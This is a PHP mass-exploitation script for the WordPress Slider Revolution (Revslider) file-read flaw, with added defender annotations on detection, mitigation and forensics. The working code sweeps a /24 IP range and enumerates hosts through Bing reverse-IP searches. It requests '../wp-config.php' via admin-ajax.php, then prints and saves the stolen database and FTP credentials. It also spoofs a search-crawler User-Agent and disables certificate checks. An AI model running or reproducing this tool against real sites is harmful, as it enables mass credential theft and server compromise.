maron0x

Wordpress Auto Exploit (Revslider)

May 7th, 2016
  1. <?php
  // Review annotation (defender's view).
  // This top-level script reads an IPv4 address from STDIN, keeps its first three
  // octets and loops the last octet over 0-255. For every address it asks bing()
  // for hostnames, then sends each host one fixed request and searches the
  // response body for wp-config.php constants (DB_*, FTP_*).
  //
  // Detection: the request never varies, so web access logs can be searched for
  //   /wp-admin/admin-ajax.php  with  action=revslider_show_image  and an  img=
  // value containing "../" or "wp-config.php". It is sent with file_get_contents(),
  // which by default adds no User-Agent header, and over plain http://.
  //
  // Mitigation: update the Slider Revolution plugin (including copies bundled
  // inside themes) to a patched release, and block path-traversal sequences in
  // the img parameter at the WAF. Where logs show this request returned data,
  // treat the database password, any FTP_* credentials and the keys/salts in
  // wp-config.php as exposed and rotate them.
  //
  // Forensics: results are appended in plaintext to rev.txt in the working
  // directory (bing() also leaves cookie.txt there), so a recovered rev.txt
  // lists the sites whose credentials were read.

  // No execution time limit; all PHP error output is silenced.
  2. set_time_limit(0);
  3. error_reporting(0);
  4.  
  5. echo "================ RevSlider AutoExpLoiT ================\n\n";
  6. echo "Coded By : Maronox  \n\n";
  7. echo "FB:Marouane El Maghribi\n\n";
  8. echo "================ Have Fun ================\n\n";
  9. echo "DATE ==> ";
  10. echo date("d/m/Y ")."heur =>  ".date( "h:i ")."\n";
  11. echo "Your Target : ";
  // Read one line (up to 1024 bytes) from STDIN and rebuild it as "a.b.c." from
  // the first three dot-separated parts.
  12. $ip=trim(fgets(STDIN,1024));
  13. $ip = explode('.',$ip);
  14. $ip = $ip[0].'.'.$ip[1].'.'.$ip[2].'.';
  15. for($i=0;$i <= 255;$i++)
  16.  
  17. {
  // Reverse-IP lookup through the search engine; site() reduces each result URL
  // to its host name and duplicates are dropped before probing.
  18. $sites = array_map("site", bing("ip:$ip.$i"));
  19. $un=array_unique($sites);
  20. echo "[+] Scanning -> ", $ip.$i, ""."\n";
  21. echo "Found : ".count($sites)." sites\n\n";
  22. foreach($un as $pok){
  // $us and $pw are not read again in this loop; $db and $host are reassigned
  // further down before they are written out.
  23. $host=findit($file,"DB_HOST', '","');");
  24. $db=findit($file,"DB_NAME', '","');");
  25. $us=findit($file,"DB_USER', '","');");
  26. $pw=findit($file,"DB_PASSWORD', '","');");
  27. $bda="http://$pok";
  // The fixed probe: the plugin's image action is asked for a path one directory
  // above its base, i.e. the site's wp-config.php. This string is the log
  // signature referred to in the annotation at the top.
  28.     $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
  29.     $dn=($bda).($linkof);
  // '@' suppresses the warning file_get_contents() raises on a failed request.
  30.     $file=@file_get_contents($dn);
  // Branch 1: the response contains DB_HOST but not FTP_USER -> print the four
  // DB_* values and append them to rev.txt.
  31.     if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
  32.     echo "[+] Scanning => ".$bda."\n\n";
  33.     echo "[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
  34.     echo "[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
  35.     echo "[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
  36.     echo "[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
  37.     $db="[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
  38.     $user="[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
  39.     $pass="[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
  40.     $host="[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
  41.     $ux = "".$bda."\r\n";
  42.     $ux1 = "".$db."\r\n";
  43.     $ux2 = "".$user."\r\n";
  44.     $ux3 = "".$pass."\r\n";
  45.     $ux4 = "".$host."\r\n";
  46.     $ux5 = "".$ip.$i."\r\n" ;
  // Append-mode, binary-safe handle on rev.txt in the current directory.
  47.     $save=fopen('rev.txt','ab');
  48.     fwrite($save,"$i"."\r\n");
  49.     fwrite($save,"$ux"."\r\n");
  50.     fwrite($save,"$ux1");
  51.     fwrite($save,"$ux2");
  52.     fwrite($save,"$ux3");
  53.     fwrite($save,"$ux4");
  54.     fwrite($save,"$ux5","\r\n");
  55.     fwrite($save,"=====================================","\r\n");
  56.  
  57.     }
  // Branch 2: the same response also defines FTP_USER -> the FTP_* constants are
  // printed (not saved). A wp-config.php that stores FTP credentials exposes
  // them through the same read, so those need rotating as well.
  58.     elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
  59.     echo "FTP user : ".findit($file,"FTP_USER','","');")."\n\n";
  60.     echo "FTP pass : ".findit($file,"FTP_PASS','","');")."\n\n";
  61.     echo "FTP host : ".findit($file,"FTP_HOST','","');")."\n\n";
  62.     }
  // Branch 3: no DB_HOST in the response.
  63.     else{echo $bda." : Shit NOt VUlnerable  \n\n";}
  64. }
  65. }
  /**
   * Return the text lying between two marker strings.
   *
   * Both markers are located case-insensitively; the closing marker is searched
   * for starting one character after the end of the opening marker.
   *
   * @param string $mytext   Text to search.
   * @param string $starttag Marker that precedes the wanted text.
   * @param string $endtag   Marker that follows the wanted text.
   * @return string Substring between the two markers.
   */
  function findit($mytext,$starttag,$endtag) {
      // Offset just past the first occurrence of the opening marker.
      $begin = strlen($starttag) + stripos($mytext, $starttag);
      // Position of the closing marker, searched from one character further on.
      $finish = stripos($mytext, $endtag, 1 + $begin);
      $length = $finish - $begin;
      return substr($mytext, $begin, $length);
  }
  /**
   * Reduce a URL to its host component.
   *
   * @param string $link URL to parse.
   * @return string Host part as reported by parse_url().
   */
  function site($link){
      $hostPart = parse_url($link, PHP_URL_HOST);
      // The search string is empty, so a string host comes back unchanged.
      return str_replace("", "", $hostPart);
  }
  // Review annotation (defender's view).
  // bing($what) pages through Bing web search for the query $what and returns the
  // unique, URL-decoded result links it could extract. The caller passes an
  // "ip:" query, i.e. a reverse-IP lookup used to enumerate the virtual hosts on
  // one address. At most 200 result pages are requested (first=1,11,...,1991);
  // the loop stops early when a page lacks the "sw_next" marker. When nothing
  // matched, the function ends without a return statement (the caller gets null).
  // Artifacts: cookie.txt is created in the working directory.
  74. function bing($what){
  75. for($i = 1; $i <= 2000; $i += 10){
  76. $ch = curl_init();
  77. curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
  // The request presents a search-crawler User-Agent string instead of
  // identifying the client that actually sends it.
  78. curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
  // Peer certificate verification is switched off. The URL above is http://, but
  // redirects are followed (see FOLLOWLOCATION), so an https hop would be
  // accepted without validation.
  79. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  // Cookies are read from and written to cookie.txt in the current directory.
  80. curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt');
  81. curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
  // Return the body as a string rather than printing it; follow redirects.
  82. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  83. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  84. $data = curl_exec($ch);
  // Capture whatever sits between ';a=' and '" h="' in the result markup.
  85. preg_match_all('#;a=(.*?)" h="#',$data, $links);
  86. foreach($links[1] as $link){
  87. $allLinks[] = $link;
  88. }
  // No "next page" marker in the response -> stop paging.
  89. if(!preg_match('#"sw_next"#',$data)) break;
  90. }
  91.  
  92. if(!empty($allLinks) && is_array($allLinks)){
  93. return array_unique(array_map("urldecode", $allLinks));
  94. }
  95. }
  96. ?>